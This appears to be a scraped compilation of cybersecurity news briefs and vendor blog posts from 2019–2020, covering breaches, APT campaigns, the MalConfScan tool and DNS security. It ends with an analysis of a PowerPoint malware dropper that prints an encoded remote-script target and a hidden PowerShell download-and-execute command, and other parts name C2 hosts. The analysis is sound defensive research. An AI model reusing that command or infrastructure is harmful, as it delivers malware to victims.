Bugs in Two Related WordPress Plugins Together Risked Over 1 Million Websites

(published: May 10, 2020)

Two critical-severity WordPress plugin vulnerabilities have been identified by the Wordfence security team which could impact over a million WordPress websites. The two plugins affected are Elementor Pro and Ultimate Addons for Elementor, and the researchers have observed active exploitation of the vulnerabilities. Exploiting the Elementor Pro plugin allows for remote code execution attacks, granting a malicious actor the ability to gain full administrative access to WordPress if the site has open user registration. Websites with the “open user registration” option disabled can be exploited using the Ultimate Addons for Elementor registration bypass vulnerability. Developers behind both plugins have patched the flaws in Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2.Recommendation: Users of these WordPress plugins should ensure they are using Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2 or newer which include fixes to the vulnerabilities. All website owners, especially those using WordPress, should keep their installations and plugins up to date to ensure patches are installed as soon as they are available.Tags: Vulnerabilities, WordPress, Plugin, Registration bypass, Remote code execution

Hacker Group Floods Dark Web with Data Stolen From 11 Companies

(published: May 9, 2020)

The threat group known as Shiny Hunters are selling millions of user records for 11 different companies on an undisclosed dark web marketplace. The databases being sold include a combined total of 164.2 million user records, and have been steadily streamed to the marketplace since the beginning of May 2020. As of the time of this writing, the prices for each database ranges between $500 and $5,000 USD. The first reported database belongs to Tokopedia, an Indonesian online store, with over 90 million user records. The other companies reportedly involved are Bhinneka, ChatBooks, Chronicle Of Higher Education, Ggumim, HomeChef, Mindful, Minted, StarTribune, Styleshare, and Zoosk. The affected companies have been contacted by Bleeping Computer, as the data breaches appear legitimate, despite not being 100% confirmed.Recommendation: Individuals that have accounts with any of the impacted companies are strongly advised to change their login credentials immediately. Additionally, it is important to not reuse passwords for multiple sites and services. If the same credentials are used on any other sites, it is suggested that those accounts also be updated with new, unique passwords.Tags: Data breach, Shiny Hunters, Dark web marketplace

Naikon APT: Cyber Espionage Reloaded

(published: May 7, 2020)

Check Point Research have discovered evidence that the Advanced Persistent Threat (APT) group known as “Naikon” have been persistently targeting national government agencies in the Asia Pacific region since 2015 as part of a cyber-espionage campaign. Naikon APT has been using a new type of Remote Access Trojan (RAT) called “Aria-body” as a backdoor into government networks, targeting ministries of foreign affairs, science, and technology in Australia, Brunei, Indonesia, Myanmar, Philippines, Thailand, and Vietnam. Aria-body infects the network and servers of one target, and then uses the compromised infrastructure to launch new attacks, exploiting the trust between departments and governments to increase the chances of success, according to the Check Point report. Naikon threat actors use several different infection methods to deliver the Aria-body RAT, including malicious emails containing a Rich Text Format (RTF) file weaponized with “RoyalRoad” exploit builder malware, or directly via a legitimate executable file, which serves as a loader. These methods are aimed at personnel within target organizations to be able to use the compromised servers to more effectively infiltrate new agencies. According to reports by Kaspersky, ThreatConnect, and Defense Group Inc. in 2015, Niakon is believed to be Chinese-speaking and associated with China’s People’s Liberation Army (PLA) intelligence operations.Recommendation: This Naikon campaign is highly targeted, therefore, it is likely that actors are impersonating government employees or agencies in spearphishing emails. All employees should be educated on the risk of opening attachments or following links received from unknown or unexpected senders. Anti-spam and antivirus protection should be implemented and kept up-to-date with the latest version to better ensure security.MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment – T1193 | [MITRE ATT&CK] Security Software Discovery – T1063 | [MITRE ATT&CK] System Network Configuration Discovery – T1016Tags: Naikon, APT, China, RAT, Aria-body, RoyalRoad, Malware

Europe’s Largest Private Hospital Operator Fresenius Hit by Ransomware

(published: May 6, 2020)

The private hospital operator Fresenius has been compromised by SNAKE Ransomware. Frentius is the largest European private healthcare provider and has been in high demand for its dialysis service and products used to combat the ongoing COVID-19 pandemic. The SNAKE ransomware is written in Golang and appeared in January 2020, it attempts to identify any processes linked to enterprise management tools and industrial control systems (ICS). This ransomware attack comes after a series of ransomware campaigns targeting health care providers who are attempting to resolve the pandemic.Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS), but as this news shows, new threats are constantly evolving to bypass these protections. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Fresenius, SNAKE, Ransomware, COVID-19

Microsoft’s GitHub Account Hacked, Private Repositories Stolen

(published: May 6, 2020)

Threat actors claim to have gained full access to Microsoft’s private GitHub account, and have stolen over 500GB of data in private Microsoft projects. According to files released to Bleeping Computer by Shiny Hunters, the threat actors behind the breach, the event likely occurred March 28th, 2020, and Microsoft has stated that they are aware and investigating the claims behind the leak. Analysts at Bleeping Computer and cyber intelligence firm Under the Breach are of the opinion that the stolen data does not appear to contain sensitive code data for Windows or Office, and is mostly samples, test projects, and other generic items. Under the Breach did tweet concerns that private API keys or passwords could have inadvertently been left in the private repositories, as this has been done by developers in the past.Recommendation: It’s best practice for GitHub and other repository users to not commit personal config files into source control and to use password management tools and multi-factor authentication. While it is currently unknown how Shiny Hunters gained access into Microsoft’s private GitHub account, malicious actors are known to comb the Internet for config files with credentials listed in plain text to gain access to repositories. Avoid committing these files in the future and be sure to discuss best practices with team members.Tags: Microsoft, GitHub, Shiny Hunters

Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets

(published: May 5, 2020)

Three critical vulnerabilities have been identified in Citrix ShareFile customer-managed storage zone controllers. Citrix ShareFile, a file sharing solution for businesses, allows employees to securely access and share proprietary and sensitive business data. According to Citrix, the vulnerabilities (CVE-2020-7473, CVE-2020-8982, CVE-2020-8983) if exploited, would allow an unauthenticated malicious actor access to ShareFile users’ documents and folders. According to Nate Warfield, a Senior Security Program Manager for the Microsoft Security Response Center, a search on Shodan revealed close to 2,800 exposed Citrix ShareFile storage servers. Citrix has released a mitigation tool and updates that include fixes for the three vulnerabilities, which affect ShareFile storage zone Controller 5.9.0, 5.8.0, 5.7.0, 5.5.0, and 5.5.0. Citrix warns that even updated storage zone controllers that were created using vulnerable versions are at risk, and must also run the mitigation tool on primary and secondary storage zone controllers.Recommendation: Threat actors are consistently looking for new ways to conduct malicious activity, therefore, it is crucial that your company has security and patch-maintenance policies in place. The security update should be applied as soon as possible to avoid potential exploitation. Citrix ShareFile customers that manage the zones themselves should ensure they are running a supported version and have run the mitigation tool (available at https://support.citrix.com/article/CTX269341, requires login credentials) if necessary.Tags: CVE-2020-7473, CVE-2020-8982, CVE-2020-8983, Citrix, ShareFile

APT Groups Target Healthcare and Essential Services

(published: May 5, 2020)

The US Department of Homeland Security (DHS) and Cybersecurity and Infrastructure Security Agency (CISA) have issued an alert regarding Advanced Persistent Threat (APT) actors targeting COVID-19 response organizations. The targeted entities include: academia, healthcare, local governments, medical research, and pharmaceutical. The unnamed APT groups are using password spraying attacks, which are automated attacks using a list of passwords. The list of passwords could be a combination of previously compromised credentials or common passwords, among others.Recommendation: It is crucial that your company has password policies in place to avoid repetition across accounts, and mandate a level of password complexity that can resist brute force and password-spray attacks. Educate your employees of the dangers that these styles of attacks impose, and why mitigation must be in place prior to an incident taking place. Threat actors of all levels of sophistication are capable of utilizing brute-force and password-spraying attacks, therefore, it is paramount that all companies take steps to avoid these attacks.Tags: APT, COVID-19, Password spraying

Kaiji: New Chinese Linux Malware Turning to Golang

(published: May 4, 2020)

A new Internet of Things (IoT) botnet called, “Kaiji,” that targets IoT devices and servers with SSH brute-force attacks, according to Intezer researchers. The malware utilizes a custom implant, which was dubbed Kaiji by MalwareMustDie, instead of utilizing some publicly-available ones such as Mirai. Kaiji was built by threat actors in the Golang programming language, which has been increasingly utilized by threat actors. The malware only targets root users while conducting its only method of propagation through SSH brute force, and if Kaiji makes a connection it will launch a bash script to begin the installation process.Recommendation: Botnet malware typically takes advantage of internet-connected devices that have been misconfigured, or do not have security updates applied, however, as Kaiji shows there are Internet of Things (IoT) botnets that conduct brute-force attacks. Any device that connects to the internet must be treated as a security liability, and default usernames and passwords must be disabled. In addition, changing default port configurations can assist in preventing malware that scans for such configuration. Organizations and defenders should be aware of all their internet facing assets and have them under strict monitoring.Tags: Botnet, IoT, Kaiji, SSH brute force

Live Streaming Adult Site Leaves 7 Terabytes of Private Data Exposed

(published: May 4, 2020)

Researchers at SafetyDetectives have identified an exposed database used by the adult streaming website CAM4[.]com which has leaked over seven terabytes of data related to customers. CAM4 is a website used for livestreaming explicit material to adults and researchers were able to find an unsecured ElasticSearch database containing the personally identifiable information (PII) of the website’s customers. The data leaked includes firstname, surname, credit card data, email addresses and sexual orientation. U.S.A, Brazil and Italy were listed as the largest customer base for the platform with 10.88 billion records identified in the leak.Recommendation: Leaks of this sort may cause affected individuals to be at a greater risk of phishing attacks. Actors can use this information to craft custom emails to increase their chances of malicious activity being approved by the recipient. Individuals who have accounts associated with this incident should change their passwords as soon as possible, particularly if passwords for said accounts are the same to other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190Tags: CAM4, Data leak, PII

Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack

(published: May 4, 2020)

Threat actors over the weekend have been targeting the Ghost publishing platform in resource hijacking campaigns to mine cryptocurrency. Ghost is an open-source platform used for publishing and has over two million customers including Mozilla and DuckDuckGo. Threat actors were leveraging the vulnerabilities registered as “CVE-2020-11651” and “CVE-2020-11652”, which allow for remote code execution capabilities on servers in data centers and in the cloud. The exploit comes from Ghost’s usage of SaltStack, which provides the server management infrastructure of the platform.Recommendation: Cryptocurrency malwares are becoming increasingly common amongst threat actors. As this story portrays, it is important that your company institute policies regarding software in use and proper maintenance. New security updates should be applied as soon as possible because they often fix minor bugs and critical vulnerabilities that delay work-flow or can be exploited by malicious actors. Third-party software vendors must ensure that their software is secure frequently to avoid customers falling victim to cyber threats due to their own vulnerabilities.MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Supply Chain Compromise – T1195 | [MITRE ATT&CK] Resource Hijacking – T1496Tags: Ghost, Resource Hijacking, Cryptocurrency mining, CVE-2020-11651, CVE-2020-11652

WildPressure APT targets industrial systems in the Middle East. ICS attack tools show increasing commodification. TrickMo works against secure banking. Microsoft warns of RCE vulnerability in the way Windows renders fonts. Click fraud malware found in childrens’ apps sold in Google Play. DarkHotel attacks the World Health Organization. Ransomware hits Parisian hospitals and a British biomedical research firm. More COVID-19 phishbait. Ben Yelin from UMD CHHS on Coronavirus detecting cameras, guest is Allan Liska from Recorded Future on security in the time of Coronavirus.

For links to all of today’s stories check our our CyberWire daily news brief:

https://thecyberwire.com/issues/issues2020/March/CyberWire_2020_03_24.html

Support our show

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

REGISTER FOR THE WEBINAR
How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT

REGISTER NOW

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1:Behaviour of MalConfScan with CuckooFigure 1:Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2:Report of MalConfScan with CuckooFigure 2:Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
{
“malconf”: [
[
{“Server1”: “diamond.ninth.biz”},
{“Server2”: “diamond.ninth.biz”},
{“Server3”: “diamond.ninth.biz”},
{“Server4”: “diamond.ninth.biz”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”
}
],
},

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

malconfscan execution result 1Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

malconfscan execution result 2Figure 2:malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

malstrscan execution resultsFigure 3:malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:

Sprog
Dansk

Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.

malware.png

These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

I marts 2018 blev projektet URLhaus lanceret af abuse.ch, der er en non-profit cyber-sikkerhedsorganisation, baseret i Schweiz.

Formålet med URLhaus er at indsamle URL’er fra sider, der distribuerer malware, hvilket efter ti måneders arbejde har resulteret i, at samarbejdet nu har lukket ikke mindre end 100.000 sider.

256 sikkerhedsforskere, der er spredt over hele verden, rapporterer hver dag til URLhaus om malware-sider, og de hjælper på den måde internetbrugerne mod malware-kampagner.

Sprog
Dansk

Keywords: malwarenon-profitLæs mere om Non-profit samarbejde har nu lukket 100.000 malware-sider

“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware

I ricercatori di sicurezza di Malwarebytes hanno individuato un nuovo malware per macOS, battezzato DarthMiner, che combina le funzionalità della backdoor EmPyre e del cryptominer XMRig.

Using removable media like USB drives in the manufacturing automation sector is a fact of life where folks from operators Read More.

The malware is believed to have been created by US and Israeli intelligence agencies. Stuxnet is designed to alter Programmable Logic Controllers (PLCs) used in the types of industrial control systems (ICS). The Stuxnet malware has made a powerful comeback after a hiatus of almost eight years, with a new variant, impacting Iranian networks.

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er hentet mere end en halv million gange.

Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Læs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps til Android fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er downloadet de mange gange.

Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Keywords: mobilmobiltelefonGoogleAndroidLæs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware

Marco Ramilli, founder and CEO at cyber security firm Yoroi has explained how to use Microsoft Powerpoint as Malware Dropper
Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.

The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Microsoft Powerpoint dropper
Stage 1: Microsoft PowerPoint Dropping Website

An external OLEobject (compatibility 2006) was available on that value:

Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″  

Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It’s showed as follows:

Microsoft Powerpoint dropper 2
Stage 2: Executed Javascript

Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.

Microsoft Powerpoint dropper 2

Microsoft Powerpoint dropper 4
Stage 3: .NET file

The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.

Microsoft Powerpoint dropper 5
Microsoft Powerpoint dropper 6
Stage4: AZORult evidence

I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans


Edited by Pierluigi Paganini

(Security Affairs – Microsoft Powerpoint, malware)

